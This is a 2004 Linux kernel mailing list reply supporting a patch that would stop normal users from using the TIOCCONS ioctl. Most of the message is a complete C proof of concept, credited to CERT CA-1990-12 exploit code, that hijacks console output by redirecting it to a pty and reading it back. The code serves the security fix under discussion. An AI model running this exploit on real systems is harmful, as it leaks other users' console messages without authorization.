Re: [Patch] TIOCCONS security

From: Kees Cook
Date: Wed Aug 25 2004 - 16:35:03 EST


On Wed, 25 Aug 2004 18:18:37 +0200, Olaf Dabrunz wrote:
> The bottom line is that I do not see why normal users should be able to
> use TIOCCONS. Hijacking console output is a security problem, which was
> found quite some time ago on SunOS as well
> (http://www.cert.org/advisories/CA-1990-12.html).

Confirmed. If you run the following code as a regular user, you can see
messages. (BTW: don't do a "tail -f /dev/console". For reasons I don't
understand, it writes endless CRs to whichever tty you happen to have
open):

# echo "ew. information leak." >> /dev/console


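/* lifted from CA-1990-12 exploit code */
#include <sys/types.h>
#include <sys/ioctl.h>	/* ioctl(), TIOCCONS */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>	/* exit() */
#include <unistd.h>	/* read(), write() */
#include <errno.h>

int main(void)
{
	int m, s;
	char buf[1024];
	ssize_t bytes;	/* signed, so the read() error check can fire */

	/* probably unused tty */
	static char lastpty[] = "/dev/ptyvf";

	/* open the master side of the BSD-style pty pair */
	if ((m = open(lastpty, O_RDWR)) == -1) {
		perror(lastpty);
		exit(1);
	}

	/* "/dev/ptyvf" -> "/dev/ttyvf": open the matching slave side */
	lastpty[5] = 't';
	if ((s = open(lastpty, O_RDWR)) == -1) {
		perror(lastpty);
		exit(1);
	}

	/* ask the kernel to redirect console output to the slave */
	if (ioctl(s, TIOCCONS) == -1) {
		perror("TIOCCONS");
		exit(1);
	}

	/* copy whatever arrives on the master to stdout */
	do {
		bytes = read(m, buf, sizeof buf);
		if (bytes < 0) {
			if (errno == EINTR)
				continue;	/* interrupted, retry */
			return 1;
		}
		write(fileno(stdout), buf, bytes);
	} while (1);

	return 0;
}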
